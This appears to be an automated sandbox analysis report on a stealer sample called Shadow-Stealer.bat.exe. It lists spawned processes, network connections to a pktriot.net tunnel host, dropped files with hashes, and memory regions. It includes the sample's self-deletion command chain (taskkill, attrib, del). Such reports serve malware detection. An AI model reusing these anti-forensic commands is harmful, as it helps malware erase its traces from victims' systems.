C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{ca3d5849-971f-46fa-b6ea-8e33e4c20a40}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{40d50a0c-a320-4ac2-a877-2d461bbf1d53}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{ad978389-d6e9-450a-b0c6-360a9b71acf8}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{56fef73a-7b3e-41cb-9dec-bc3ea2609aac}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{e33ab120-c4f4-44f4-b064-46101783cf7a}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{980745c6-a03c-4fd2-b338-9772e64035ba}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5732 -ip 5732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 476

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{bf65b796-427b-4c14-8060-f7bb17b83de9}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 688 -p 5532 -ip 5532

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{22216ce1-e38d-4ceb-89da-003019ff7b6a}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5532 -s 312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6064 -ip 6064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 476

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 408 -p 3732 -ip 3732

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3732 -s 940

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

MD5 0e9ccd796e251916133392539572a374
SHA1 eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256 c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512 e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

memory/5052-4-0x00007FF8641C3000-0x00007FF8641C5000-memory.dmp

memory/5052-14-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uee1a3a3.oxg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5052-5-0x000002877AC40000-0x000002877AC62000-memory.dmp

memory/5052-15-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-16-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-17-0x0000028700000000-0x0000028700024000-memory.dmp

memory/5052-19-0x00007FF884550000-0x00007FF88460D000-memory.dmp

memory/5052-18-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/5052-20-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-21-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-22-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-23-0x0000028700330000-0x0000028700D80000-memory.dmp

memory/5052-25-0x0000028700D80000-0x0000028700E26000-memory.dmp

memory/5052-26-0x0000028700E30000-0x0000028700E86000-memory.dmp

memory/5052-27-0x0000028700E90000-0x0000028700EE8000-memory.dmp

memory/5052-28-0x0000028700EF0000-0x0000028700F12000-memory.dmp

memory/5052-29-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/5052-31-0x00000287011E0000-0x00000287011EA000-memory.dmp

memory/4804-32-0x0000000140000000-0x0000000140004000-memory.dmp

memory/5052-35-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/3852-36-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4804-34-0x0000000140000000-0x0000000140004000-memory.dmp

memory/3852-40-0x0000000000400000-0x0000000000406000-memory.dmp

memory/5052-39-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

memory/5052-50-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

memory/3376-63-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/3376-64-0x00007FF884550000-0x00007FF88460D000-memory.dmp

memory/3376-65-0x000001C72C3F0000-0x000001C72C976000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.3de27bd6-27d3-4e8b-8fb8-ed8767f6d008.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6f8a75da-a379-4005-81bb-d5cfc52bf66b.tmp.txt

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b7dc8a3a-917a-4108-aa68-babea3ea7976.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b887b74b-fc56-4986-9735-6b2e57235bca.tmp.txt

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ada51214-6507-4896-8df6-667eb1b78be9.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bb5d6639-1f2b-4ff2-b97d-0a444c98fe71.tmp.txt

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.96a06089-492f-42f6-b935-86a105cb6905.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6bc79591-81e3-462e-9757-2417cf610904.tmp.txt

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.13525c67-d246-49b1-9cc9-aaea80c983f7.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d196a0d9-62fe-4327-b08f-bb9ff5b1ec9b.tmp.txt

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.73d7450b-e12d-4fe1-b79d-4b898a10ab60.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2b635f1f-dbf4-4168-933a-a601aed43ea3.tmp.txt